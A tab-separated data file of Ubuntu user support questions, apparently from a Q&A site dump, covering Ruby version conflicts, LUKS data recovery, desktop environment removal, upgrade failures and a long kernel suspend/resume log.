483580	ubuntu 12.04 , ruby installation	i 'm new to ubuntu and ruby and i have a problem , which seems to be strange . i needed to install ubuntu because of problems with ruby on windows . i 've installed ruby , v. 1.9.3 ( the same as i had on windows ) . when i launched bundle install , i got this error message : installing nokogiri ( 1.6.0 ) /usr/lib/ruby/vendor_ruby/1.8/rubygems/installer.rb:388 : in ensure_required_ruby_version_met ' : nokogiri requires ruby version > = 1.9.2 . ( gem : :installerror ) but i have version > = 1.9.2 . ruby -v returns me ruby 1.8.7 . strange , i installed 1.9.3 . when i tried rvm install 1.9.3 , the message was already installed ruby-1.9.3.-p547 . which ruby returns me /usr/bin/ruby - because there is only one ruby version . i used this tutorial http : //ryanbigg.com/2010/12/ubuntu-ruby-rvm-rails-and-you/ , just write 1.9.3 instead of 2.1.0 . projects are made in ruby 1.9.3 , there should be any problems when using newer one , it 's the real reason why i tried to install this elder ruby version . any idea what does this version mess mean ?
483584	recover data from formatted lvm ( luks , ext3 ) after ubuntu installed over it	i have a 1tb hdd and some days ago i did a mess that disk had : one ext3 partition ( / ) one ext3 partition ( /boot ) one luks lvm which had a ext3 partition of about 200 gb i wanted to replace linux mint 14 with ubuntu 14.04 , so i booted ubuntu 14.04 from usb and did the installation wizard . the wizard asked me `` replace linux mint 14 with ubuntu 14.04 '' , so i did , i also checked to add lvm and to crypt user directory . i set up a password and i installed it . the installation blocked itself almost at end , and by rebooting via usb i noticed that the hdd was formatted and there was just the /boot and the / ( my luks lvm was formatted and replaced with those two partitions ) i have the disk itself the dd image of the disk after the disaster ( a 1tb img ) the passphrase to unlock both the lvm : the oldest one ( which i want to recover ) and the newest one ( to unlock the root partition ) question how can i recover my precious data ?
483586	how to remove kubuntu desktop environment and change to default unity desktop environment ?	i am new to ubuntu 14.04 . i have installed kde recently.i do n't know how to uninstall/remove it . it displays an error message and i want to switch back to default unity desktop environment . how to change to default through terminal ? i want to definitely know because i could not open any application ( including my files/folders ) other than terminal ( for which i know the shortcut ) . i want to switch back to unity badly . in the xsessions command in terminal it displays ubuntu.desktop and kubuntu-plasma.desktop ; but when i try to remove it shows : no such package is there .
483587	hotkeys in russian keyboard layout	i saw many closed topics about this , but none of proposed solutions working . when i switch to russian keyboard , shortcuts ( ctrl+c , ctrl+v , ctrl+z , etc . ) not working in most of applications . i have updated system 14.04 . propose the solution , but do n't just close the thread saying that everything is working ! thanks in advance for any help , because i 'm realy tired of this and start to think about other linux distros .
483589	moing from 12.04 to 14.04	i 'm currently on a system that runs only 12.04 . i have downloaded the 14.04 iso file . my cd rom isnt working so i dont have the option of installing through the cd which i followed last time when i installed 12.04 . i tried copying the iso file to a 8gb usb stick and booting from that . but due to some reason the system is not able to boot from the disk . even though i have been using ubuntu for a long time , i do n't get along with the terminal very well . i tried reading a couple of simple instructions on updating software through ttyl , but i 'm getting some error . can someone help me out here . thanks !
483591	upgrade from ubuntu 11.10	i 've been trying for some time now to upgrade but the message '' authenticating the upgrade failed . there may be a problem with the network or with the server '' , keeps coming up . what should i do ? by the way i 'm using ubuntu 11.10 64-bit and think an upgrade is suitable now .
483593	14.04 lts | log files | debugging unity , gnome , xsession	i 'm unable to fix my ubuntu desktop ( gui only ) . see : 14.04 lts | unity reset but cant login normally 14.04 lts no dash / launcher after update through software updater the issue is in the areas of unity / gnome / xsession . how should i debug ? which are the useful log files i can look into and post to this forum for help ?
483596	diagnose complete system hang 12.04 dell xps 13	i occasionally have a complete system hang on my dell xps 13 developer edition laptop ( the one that comes with ubuntu pre-installed ) . there 's complete system unresponsiveness , cpu seems to go to 100 % as the fan starts immediately and i have to power off my holding power button it happens in chrome 90 % of the time , and is unrelated to temperature or cpu load , but it just happened on resume from stand by , so i wonder if it 's related somehow to power management stuff ? i do n't know how to diagnose , but here 's part of my kernel log that shows the log up from just before standby , through the resume , and then the start of the reboot after i powered back on . any clues from this ? anything else i can look at to diagnose , or any tools that particularly help track data around complete system hangs ? thanks , m jun 15 11:53:06 james-xps kernel : [ 130535.132452 ] init : anacron main process ( 8207 ) killed by term signal jun 15 11:53:10 james-xps kernel : [ 130539.425534 ] usbcore : deregistering interface driver btusb jun 15 11:53:10 james-xps kernel : [ 130539.532705 ] pm : syncing filesystems ... done . jun 15 11:53:10 james-xps kernel : [ 130539.576596 ] pm : preparing system for mem sleep jun 15 13:05:24 james-xps kernel : [ 130540.314918 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . jun 15 13:05:24 james-xps kernel : [ 130540.330797 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . jun 15 13:05:24 james-xps kernel : [ 130540.346778 ] pm : entering mem sleep jun 15 13:05:24 james-xps kernel : [ 130540.346824 ] suspending console ( s ) ( use no_console_suspend to debug ) jun 15 13:05:24 james-xps kernel : [ 130540.347115 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache jun 15 13:05:24 james-xps kernel : [ 130540.348380 ] sd 0:0:0:0 : [ sda ] stopping disk jun 15 13:05:24 james-xps kernel : [ 130540.558010 ] pm : suspend of drv : psmouse dev : serio1 complete after 211.234 msecs jun 15 13:05:24 james-xps kernel : [ 130540.559495 ] snd_hda_intel 0000:00:1b.0 : pci int a disabled jun 15 13:05:24 james-xps kernel : [ 130540.574375 ] ehci_hcd 0000:00:1d.0 : pci int a disabled jun 15 13:05:24 james-xps kernel : [ 130540.574381 ] ehci_hcd 0000:00:1a.0 : pci int a disabled jun 15 13:05:24 james-xps kernel : [ 130540.974595 ] pm : suspend of drv : sd dev:0:0:0:0 complete after 628.295 msecs jun 15 13:05:24 james-xps kernel : [ 130540.974638 ] pm : suspend of drv : scsi dev : target0:0:0 complete after 628.322 msecs jun 15 13:05:24 james-xps kernel : [ 130540.974700 ] pm : suspend of drv : scsi dev : host0 complete after 416.032 msecs jun 15 13:05:24 james-xps kernel : [ 130540.989853 ] pm : suspend of drv : ahci dev:0000:00:1f.2 complete after 431.033 msecs jun 15 13:05:24 james-xps kernel : [ 130540.989893 ] pm : suspend of drv : dev : pci0000:00 complete after 430.841 msecs jun 15 13:05:24 james-xps kernel : [ 130540.989918 ] pm : suspend of devices complete after 643.837 msecs jun 15 13:05:24 james-xps kernel : [ 130540.989920 ] pm : suspend devices took 0.644 seconds jun 15 13:05:24 james-xps kernel : [ 130541.005934 ] ehci_hcd 0000:00:1d.0 : pme # enabled jun 15 13:05:24 james-xps kernel : [ 130541.005971 ] ehci_hcd 0000:00:1d.0 : wake-up capability enabled by acpi jun 15 13:05:24 james-xps kernel : [ 130541.021911 ] ehci_hcd 0000:00:1a.0 : pme # enabled jun 15 13:05:24 james-xps kernel : [ 130541.021948 ] ehci_hcd 0000:00:1a.0 : wake-up capability enabled by acpi jun 15 13:05:24 james-xps kernel : [ 130541.053802 ] xhci_hcd 0000:00:14.0 : pme # enabled jun 15 13:05:24 james-xps kernel : [ 130541.053814 ] xhci_hcd 0000:00:14.0 : wake-up capability enabled by acpi jun 15 13:05:24 james-xps kernel : [ 130541.069776 ] pm : late suspend of devices complete after 79.943 msecs jun 15 13:05:24 james-xps kernel : [ 130541.070006 ] acpi : preparing to enter system sleep state s3 jun 15 13:05:24 james-xps kernel : [ 130541.082106 ] pm : saving platform nvs memory jun 15 13:05:24 james-xps kernel : [ 130541.083169 ] disabling non-boot cpus ... jun 15 13:05:24 james-xps kernel : [ 130541.185574 ] cpu 1 is now offline jun 15 13:05:24 james-xps kernel : [ 130541.289439 ] cpu 2 is now offline jun 15 13:05:24 james-xps kernel : [ 130541.393312 ] cpu 3 is now offline jun 15 13:05:24 james-xps kernel : [ 130541.393687 ] extended cmos year : 2000 jun 15 13:05:24 james-xps kernel : [ 130541.393996 ] acpi : low-level resume complete jun 15 13:05:24 james-xps kernel : [ 130541.394036 ] pm : restoring platform nvs memory jun 15 13:05:24 james-xps kernel : [ 130541.394358 ] cpu0 : thermal monitoring handled by smi jun 15 13:05:24 james-xps kernel : [ 130541.394414 ] extended cmos year : 2000 jun 15 13:05:24 james-xps kernel : [ 130541.394457 ] enabling non-boot cpus ... jun 15 13:05:24 james-xps kernel : [ 130541.394550 ] booting node 0 processor 1 apic 0x1 jun 15 13:05:24 james-xps kernel : [ 130541.394552 ] smpboot cpu 1 : start_ip = 98000 jun 15 13:05:24 james-xps kernel : [ 130541.405686 ] calibrating delay loop ( skipped ) already calibrated this cpu jun 15 13:05:24 james-xps kernel : [ 130541.406168 ] cpu1 : thermal monitoring handled by smi jun 15 13:05:24 james-xps kernel : [ 130541.426934 ] cpu1 is up jun 15 13:05:24 james-xps kernel : [ 130541.427023 ] booting node 0 processor 2 apic 0x2 jun 15 13:05:24 james-xps kernel : [ 130541.427025 ] smpboot cpu 2 : start_ip = 98000 jun 15 13:05:24 james-xps kernel : [ 130541.438042 ] calibrating delay loop ( skipped ) already calibrated this cpu jun 15 13:05:24 james-xps kernel : [ 130541.438518 ] cpu2 : thermal monitoring handled by smi jun 15 13:05:24 james-xps kernel : [ 130541.459220 ] cpu2 is up jun 15 13:05:24 james-xps kernel : [ 130541.459304 ] booting node 0 processor 3 apic 0x3 jun 15 13:05:24 james-xps kernel : [ 130541.459306 ] smpboot cpu 3 : start_ip = 98000 jun 15 13:05:24 james-xps kernel : [ 130541.470323 ] calibrating delay loop ( skipped ) already calibrated this cpu jun 15 13:05:24 james-xps kernel : [ 130541.470807 ] cpu3 : thermal monitoring handled by smi jun 15 13:05:24 james-xps kernel : [ 130541.491669 ] cpu3 is up jun 15 13:05:24 james-xps kernel : [ 130541.496550 ] acpi : waking up from system sleep state s3 jun 15 13:05:24 james-xps kernel : [ 130541.534015 ] i915 0000:00:02.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 15 13:05:24 james-xps kernel : [ 130541.534025 ] i915 0000:00:02.0 : restoring config space at offset 0x1 ( was 0x900007 , writing 0x900407 ) jun 15 13:05:24 james-xps kernel : [ 130541.534050 ] xhci_hcd 0000:00:14.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 15 13:05:24 james-xps kernel : [ 130541.534066 ] xhci_hcd 0000:00:14.0 : restoring config space at offset 0x4 ( was 0x4 , writing 0xd0500004 ) jun 15 13:05:24 james-xps kernel : [ 130541.534073 ] xhci_hcd 0000:00:14.0 : restoring config space at offset 0x1 ( was 0x2900000 , writing 0x2900402 ) jun 15 13:05:24 james-xps kernel : [ 130541.534103 ] xhci_hcd 0000:00:14.0 : wake-up capability disabled by acpi jun 15 13:05:24 james-xps kernel : [ 130541.534111 ] xhci_hcd 0000:00:14.0 : pme # disabled jun 15 13:05:24 james-xps kernel : [ 130541.534123 ] mei 0000:00:16.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 15 13:05:24 james-xps kernel : [ 130541.534138 ] mei 0000:00:16.0 : restoring config space at offset 0x4 ( was 0xfed0a004 , writing 0xd0515004 ) jun 15 13:05:24 james-xps kernel : [ 130541.534165 ] ehci_hcd 0000:00:1a.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 15 13:05:24 james-xps kernel : [ 130541.534182 ] ehci_hcd 0000:00:1a.0 : restoring config space at offset 0x4 ( was 0x0 , writing 0xd051a000 ) jun 15 13:05:24 james-xps kernel : [ 130541.534189 ] ehci_hcd 0000:00:1a.0 : restoring config space at offset 0x1 ( was 0x2900000 , writing 0x2900002 ) jun 15 13:05:24 james-xps kernel : [ 130541.534227 ] ehci_hcd 0000:00:1a.0 : wake-up capability disabled by acpi jun 15 13:05:24 james-xps kernel : [ 130541.534235 ] ehci_hcd 0000:00:1a.0 : pme # disabled jun 15 13:05:24 james-xps kernel : [ 130541.534252 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x107 ) jun 15 13:05:24 james-xps kernel : [ 130541.534267 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0x4 ( was 0x4 , writing 0xd0510004 ) jun 15 13:05:24 james-xps kernel : [ 130541.534272 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0x3 ( was 0x0 , writing 0x10 ) jun 15 13:05:24 james-xps kernel : [ 130541.534278 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0x1 ( was 0x100000 , writing 0x100002 ) jun 15 13:05:24 james-xps kernel : [ 130541.534314 ] pcieport 0000:00:1c.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 15 13:05:24 james-xps kernel : [ 130541.534329 ] pcieport 0000:00:1c.0 : restoring config space at offset 0x9 ( was 0x10001 , writing 0x1fff1 ) jun 15 13:05:24 james-xps kernel : [ 130541.534334 ] pcieport 0000:00:1c.0 : restoring config space at offset 0x8 ( was 0x0 , writing 0xd040d040 ) jun 15 13:05:24 james-xps kernel : [ 130541.534339 ] pcieport 0000:00:1c.0 : restoring config space at offset 0x7 ( was 0x0 , writing 0xf0 ) jun 15 13:05:24 james-xps kernel : [ 130541.534350 ] pcieport 0000:00:1c.0 : restoring config space at offset 0x3 ( was 0x810000 , writing 0x810010 ) jun 15 13:05:24 james-xps kernel : [ 130541.534358 ] pcieport 0000:00:1c.0 : restoring config space at offset 0x1 ( was 0x100000 , writing 0x100007 ) jun 15 13:05:24 james-xps kernel : [ 130541.534397 ] ehci_hcd 0000:00:1d.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10a ) jun 15 13:05:24 james-xps kernel : [ 130541.534414 ] ehci_hcd 0000:00:1d.0 : restoring config space at offset 0x4 ( was 0x0 , writing 0xd0519000 ) jun 15 13:05:24 james-xps kernel : [ 130541.534421 ] ehci_hcd 0000:00:1d.0 : restoring config space at offset 0x1 ( was 0x2900000 , writing 0x2900002 ) jun 15 13:05:24 james-xps kernel : [ 130541.534451 ] ehci_hcd 0000:00:1d.0 : wake-up capability disabled by acpi jun 15 13:05:24 james-xps kernel : [ 130541.534457 ] ehci_hcd 0000:00:1d.0 : pme # disabled jun 15 13:05:24 james-xps kernel : [ 130541.534519 ] ahci 0000:00:1f.2 : restoring config space at offset 0x1 ( was 0x2b00403 , writing 0x2b00407 ) jun 15 13:05:24 james-xps kernel : [ 130541.534712 ] iwlwifi 0000:01:00.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 15 13:05:24 james-xps kernel : [ 130541.534844 ] iwlwifi 0000:01:00.0 : restoring config space at offset 0x4 ( was 0x4 , writing 0xd0400004 ) jun 15 13:05:24 james-xps kernel : [ 130541.534880 ] iwlwifi 0000:01:00.0 : restoring config space at offset 0x3 ( was 0x0 , writing 0x10 ) jun 15 13:05:24 james-xps kernel : [ 130541.534926 ] iwlwifi 0000:01:00.0 : restoring config space at offset 0x1 ( was 0x100000 , writing 0x100406 ) jun 15 13:05:24 james-xps kernel : [ 130541.535243 ] pm : early resume of devices complete after 1.278 msecs jun 15 13:05:24 james-xps kernel : [ 130541.535392 ] i915 0000:00:02.0 : setting latency timer to 64 jun 15 13:05:24 james-xps kernel : [ 130541.535397 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 jun 15 13:05:24 james-xps kernel : [ 130541.535450 ] usb usb3 : root hub lost power or was reset jun 15 13:05:24 james-xps kernel : [ 130541.535452 ] usb usb4 : root hub lost power or was reset jun 15 13:05:24 james-xps kernel : [ 130541.535457 ] mei 0000:00:16.0 : irq 41 for msi/msi-x jun 15 13:05:24 james-xps kernel : [ 130541.535522 ] ehci_hcd 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 jun 15 13:05:24 james-xps kernel : [ 130541.535537 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 jun 15 13:05:24 james-xps kernel : [ 130541.535553 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 jun 15 13:05:24 james-xps kernel : [ 130541.535578 ] ehci_hcd 0000:00:1a.0 : setting latency timer to 64 jun 15 13:05:24 james-xps kernel : [ 130541.535592 ] usb usb1 : root hub lost power or was reset jun 15 13:05:24 james-xps kernel : [ 130541.535623 ] snd_hda_intel 0000:00:1b.0 : irq 43 for msi/msi-x jun 15 13:05:24 james-xps kernel : [ 130541.535685 ] xhci_hcd 0000:00:14.0 : irq 45 for msi/msi-x jun 15 13:05:24 james-xps kernel : [ 130541.535691 ] ehci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 jun 15 13:05:24 james-xps kernel : [ 130541.535711 ] ehci_hcd 0000:00:1d.0 : setting latency timer to 64 jun 15 13:05:24 james-xps kernel : [ 130541.535736 ] usb usb2 : root hub lost power or was reset jun 15 13:05:24 james-xps kernel : [ 130541.535785 ] ahci 0000:00:1f.2 : setting latency timer to 64 jun 15 13:05:24 james-xps kernel : [ 130541.539467 ] ehci_hcd 0000:00:1a.0 : cache line size of 64 is not supported jun 15 13:05:24 james-xps kernel : [ 130541.539621 ] ehci_hcd 0000:00:1d.0 : cache line size of 64 is not supported jun 15 13:05:24 james-xps kernel : [ 130541.539632 ] sd 0:0:0:0 : [ sda ] starting disk jun 15 13:05:24 james-xps kernel : [ 130541.641584 ] legacy_resume ( ) : pnp_bus_resume+0x0/0x70 returns -19 jun 15 13:05:24 james-xps kernel : [ 130541.641588 ] pm : device 00:07 failed to resume : error -19 jun 15 13:05:24 james-xps kernel : [ 130541.653705 ] pm : resume of drv : hub dev:3-0:1.0 complete after 114.372 msecs jun 15 13:05:24 james-xps kernel : [ 130541.653719 ] pm : resume of drv : dev : ep_81 complete after 114.375 msecs jun 15 13:05:24 james-xps kernel : [ 130541.653728 ] pm : resume of drv : dev : ep_00 complete after 114.341 msecs jun 15 13:05:24 james-xps kernel : [ 130541.657731 ] pm : resume of drv : dev : ep_00 complete after 118.255 msecs jun 15 13:05:24 james-xps kernel : [ 130541.657748 ] pm : resume of drv : hub dev:4-0:1.0 complete after 118.310 msecs jun 15 13:05:24 james-xps kernel : [ 130541.657793 ] pm : resume of drv : dev : ep_81 complete after 118.337 msecs jun 15 13:05:24 james-xps kernel : [ 130541.773585 ] pm : resume of drv : dev : ep_00 complete after 237.776 msecs jun 15 13:05:24 james-xps kernel : [ 130541.773590 ] pm : resume of drv : hub dev:2-0:1.0 complete after 237.910 msecs jun 15 13:05:24 james-xps kernel : [ 130541.773595 ] pm : resume of drv : dev : ep_00 complete after 237.956 msecs jun 15 13:05:24 james-xps kernel : [ 130541.773603 ] pm : resume of drv : hub dev:1-0:1.0 complete after 238.007 msecs jun 15 13:05:24 james-xps kernel : [ 130541.773625 ] pm : resume of drv : dev : ep_81 complete after 237.822 msecs jun 15 13:05:24 james-xps kernel : [ 130541.773632 ] pm : resume of drv : dev : ep_81 complete after 238.013 msecs jun 15 13:05:24 james-xps kernel : [ 130541.853454 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) jun 15 13:05:24 james-xps kernel : [ 130541.869250 ] ata1.00 : configured for udma/133 jun 15 13:05:24 james-xps kernel : [ 130541.885427 ] usb 2-1 : reset high-speed usb device number 2 using ehci_hcd jun 15 13:05:24 james-xps kernel : [ 130541.921670 ] pm : resume of drv : sd dev:0:0:0:0 complete after 382.529 msecs jun 15 13:05:24 james-xps kernel : [ 130541.921690 ] pm : resume of drv : scsi_disk dev:0:0:0:0 complete after 279.447 msecs jun 15 13:05:24 james-xps kernel : [ 130541.921708 ] pm : resume of drv : scsi_device dev:0:0:0:0 complete after 382.554 msecs jun 15 13:05:24 james-xps kernel : [ 130542.129094 ] usb 1-1 : reset high-speed usb device number 2 using ehci_hcd jun 15 13:05:24 james-xps kernel : [ 130542.154711 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input21 jun 15 13:05:24 james-xps kernel : [ 130542.224995 ] pm : resume of drv : hub dev:2-1:1.0 complete after 686.107 msecs jun 15 13:05:24 james-xps kernel : [ 130542.225014 ] pm : resume of drv : dev : ep_00 complete after 686.093 msecs jun 15 13:05:24 james-xps kernel : [ 130542.225024 ] pm : resume of drv : dev : ep_81 complete after 686.123 msecs jun 15 13:05:24 james-xps kernel : [ 130542.333102 ] usb 2-1.5 : reset full-speed usb device number 3 using ehci_hcd jun 15 13:05:24 james-xps kernel : [ 130542.427986 ] pm : resume of drv : usb dev:2-1.5:1.0 complete after 889.204 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428007 ] pm : resume of drv : usb dev:2-1.5:1.1 complete after 889.162 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428013 ] pm : resume of drv : dev : ep_00 complete after 889.116 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428021 ] pm : resume of drv : dev : ep_83 complete after 889.143 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428025 ] pm : resume of drv : dev : ep_03 complete after 889.160 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428030 ] pm : resume of drv : dev : ep_81 complete after 889.227 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428050 ] pm : resume of drv : dev : ep_82 complete after 889.222 msecs jun 15 13:05:24 james-xps kernel : [ 130542.428063 ] pm : resume of drv : dev : ep_02 complete after 889.251 msecs jun 15 13:05:24 james-xps kernel : [ 130542.468684 ] pm : resume of drv : dev : ep_00 complete after 930.148 msecs jun 15 13:05:24 james-xps kernel : [ 130542.468700 ] pm : resume of drv : hub dev:1-1:1.0 complete after 930.205 msecs jun 15 13:05:24 james-xps kernel : [ 130542.468715 ] pm : resume of drv : dev : ep_81 complete after 930.200 msecs jun 15 13:05:24 james-xps kernel : [ 130542.540799 ] usb 1-1.5 : reset high-speed usb device number 3 using ehci_hcd jun 15 13:05:24 james-xps kernel : [ 130543.175687 ] pm : resume of drv : uvcvideo dev:1-1.5:1.1 complete after 1637.923 msecs jun 15 13:05:24 james-xps kernel : [ 130543.175714 ] pm : resume of drv : dev : ep_00 complete after 1637.936 msecs jun 15 13:05:24 james-xps kernel : [ 130543.175716 ] pm : resume of drv : uvcvideo dev:1-1.5:1.0 complete after 1637.988 msecs jun 15 13:05:24 james-xps kernel : [ 130543.175726 ] pm : resume of drv : dev : ep_87 complete after 1637.982 msecs jun 15 13:05:24 james-xps kernel : [ 130543.435518 ] pm : resume of drv : i915 dev:0000:00:02.0 complete after 1902.596 msecs jun 15 13:05:24 james-xps kernel : [ 130543.435631 ] pm : resume of devices complete after 1902.778 msecs jun 15 13:05:24 james-xps kernel : [ 130543.435698 ] pm : resume devices took 1.904 seconds jun 15 13:05:24 james-xps kernel : [ 130543.435758 ] pm : finishing wakeup . jun 15 13:05:24 james-xps kernel : [ 130543.435759 ] restarting tasks ... done . jun 15 13:05:24 james-xps kernel : [ 130543.438420 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 18000000 , was 12060000 jun 15 13:05:24 james-xps kernel : [ 130543.453876 ] video lnxvideo:00 : restoring backlight state jun 15 13:05:24 james-xps kernel : [ 130543.581175 ] bluetooth : generic bluetooth usb driver ver 0.6 jun 15 13:05:24 james-xps kernel : [ 130543.583443 ] usbcore : registered new interface driver btusb jun 15 13:05:26 james-xps kernel : [ 130546.261363 ] init : anacron main process ( 8703 ) killed by term signal jun 15 13:05:26 james-xps kernel : [ 130546.273015 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s jun 15 13:05:26 james-xps kernel : [ 130546.279901 ] iwlwifi 0000:01:00.0 : radio type=0x2-0x1-0x0 jun 15 13:05:27 james-xps kernel : [ 130546.416374 ] addrconf ( netdev_up ) : wlan0 : link is not ready jun 15 13:05:34 james-xps kernel : [ 130554.133681 ] wlan0 : authenticate with 64:66 : b3:64:01:1b ( try 1 ) jun 15 13:05:34 james-xps kernel : [ 130554.275630 ] wlan0 : authenticated jun 15 13:05:34 james-xps kernel : [ 130554.288816 ] wlan0 : associate with 64:66 : b3:64:01:1b ( try 1 ) jun 15 13:05:34 james-xps kernel : [ 130554.309958 ] wlan0 : rx assocresp from 64:66 : b3:64:01:1b ( capab=0x431 status=0 aid=5 ) jun 15 13:05:34 james-xps kernel : [ 130554.309971 ] wlan0 : associated jun 15 13:05:34 james-xps kernel : [ 130554.309981 ] wlan0 : no basic rates in assocresp . using min supported rate instead . jun 15 13:05:34 james-xps kernel : [ 130554.357539 ] addrconf ( netdev_change ) : wlan0 : link becomes ready jun 15 13:05:39 james-xps kernel : [ 130558.901312 ] iwlwifi 0000:01:00.0 : tx aggregation enabled on ra = 64:66 : b3:64:01:1b tid = 0 jun 15 13:05:45 james-xps kernel : [ 130564.839667 ] wlan0 : no ipv6 routers present jun 15 13:06:41 james-xps kernel : imklog 5.8.6 , log source = /proc/kmsg started . jun 15 13:06:41 james-xps kernel : [ 0.000000 ] initializing cgroup subsys cpuset jun 15 13:06:41 james-xps kernel : [ 0.000000 ] initializing cgroup subsys cpu jun 15 13:06:41 james-xps kernel : [ 0.000000 ] linux version 3.2.0-64-generic ( buildd @ kissel ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 97-ubuntu smp wed jun 4 22:04:21 utc 2014 ( ubuntu 3.2.0-64.97-generic 3.2.59 ) jun 15 13:06:41 james-xps kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.2.0-64-generic root=uuid=9bc4c12f-12bf-4583-bf9d-cb3ff8734cd4 roquiet splash vt.handoff=7 jun 15 13:06:41 james-xps kernel : [ 0.000000 ] kernel supported cpus : jun 15 13:06:41 james-xps kernel : [ 0.000000 ] intel genuineintel jun 15 13:06:41 james-xps kernel : [ 0.000000 ] amd authenticamd jun 15 13:06:41 james-xps kernel : [ 0.000000 ] centaur centaurhauls jun 15 13:06:41 james-xps kernel : [ 0.000000 ] bios-provided physical ram map :
483598	color adjusting in vlc	does the vlc media player 2.0.8 have a control for separate adjusting r , g , b of its window ? i have not found any ; does a plugin exist for the purpose ? thanks !
483600	can only boot in recovery mode and resuming normal boot , but then ubuntu gets very slow after resuming normal boot	i 've just installed ubuntu 14.04 ( ubuntu only no windows ) and i 'm not able to do a normal boot , screen freezes . i have to go to recovery mode and then `` resume normal boot '' to start ubuntu . that would not be a big problem but i suspect that resuming normal boot after booting in recovery mode causes the interface to be very slow and laggy . when resuming normal boot , ubuntu warns that `` some graphic drivers require a full graphical boot and so will fail when resuming from recovery . '' so that 's why i 'm assuming this is the cause of the interface being slow . i already tried `` nomodeset '' that i read in other questions but that did nothing . specs : intel® atom™ n470 ( 1.83ghz ) intel® nm10 express chipset intel® graphics media accelerator 3150 so do i have to install specific drivers for this video card ? could it be that the lack of a proper driver is preventing ubuntu from booting ?
483602	monitor goes sleep during fullscreen black scene	my monitor ( samsung syncmaster 171s ) turns into sleep mode for few seconds when there is totally black scene in fullscreen ( for example : between two scenes in a movie ) . how can i disable it ? i 'm using asus eee 1000h with ubuntu 14.04 . have the same problrm , when monitor is plugged in into dell optiplex gx620 with linux mint 16 cinnamon .
483611	e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem .	i am new on ubuntu whenever i am trying to get the update i am getting the error at last ign http : //in.archive.ubuntu.com trusty-updates/multiverse translation-en_in ign http : //in.archive.ubuntu.com trusty-updates/restricted translation-en_in ign http : //in.archive.ubuntu.com trusty-updates/universe translation-en_in ign http : //in.archive.ubuntu.com trusty-backports/main translation-en_in ign http : //in.archive.ubuntu.com trusty-backports/multiverse translation-en_in ign http : //in.archive.ubuntu.com trusty-backports/restricted translation-en_in ign http : //in.archive.ubuntu.com trusty-backports/universe translation-en_in e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . and then according to propted error when i run $ sudo dpkg -- configure -a dpkg : error : parsing file '/var/lib/dpkg/updates/0009 ' near line 0 : newline in field name ` # padding' what how can i get out of the error . i tried this link
483612	how to remove ubuntu-desktop completely and retain gnome-shell ?	i have installed gnome-shell and want to remove ubuntu-desktop . how do i do that without destroying gnome-shell ? because , right now , i got many duplicates , e.g . two software updater and two system settings .
483620	could not write bytes broken pipe	i 've found many questions similar to this , but my problem is quite specific so please do not mark it as duplicate . i 've been using ubuntu 12.04 for about 1.5 years . yesterday the left click of my touchpad suddenly became unresponsive , however it was working perfectly with an external mouse . out of curiosity , i did what was mentioned over here , keyboard and mouse unresponsive after suspend sudo apt-get install -- reinstall xserver-xorg-input-all . i got a message saying compiz has crashed . when i tried to reboot it now just says 'could not write bytes : broken pipe ' . any advice would be greatly appreciated .
483621	will performance be worse if i encrypt the entire hard drive / sdd ?	if i use whole disk encryption , will i notice a drop in performance ? and what about for a ssd ? and i see that there is a option in my bios that enables intel aes-ni does this have any effect on my encryption ?
483626	small title bar text	i am using mythbuntu 14.04 . everything in myth is working and the correct size . the problem is i selected the nvidia driver during the install and now the text in any title bar window that i open is too small to read . another post suggested switching to nouveau driver and change the font size from 14 to 11 . what is the simplest way to do that in mythbuntu ? i tried to reinstall but was not given the option to select a video driver in the re-install .
483632	keyfiles need to be imported for kubuntu - [ schl端sseldatei importieren f端r ubuntu ]	every time i try to update my ubuntu os i get the following error message : keyfiles need to be imported for kubuntu [ hope this is somewhat accurate translated ] schl端sseldatei importieren f端r kubuntu but how do i do it and where to get them ? ! -- thank you in advance !
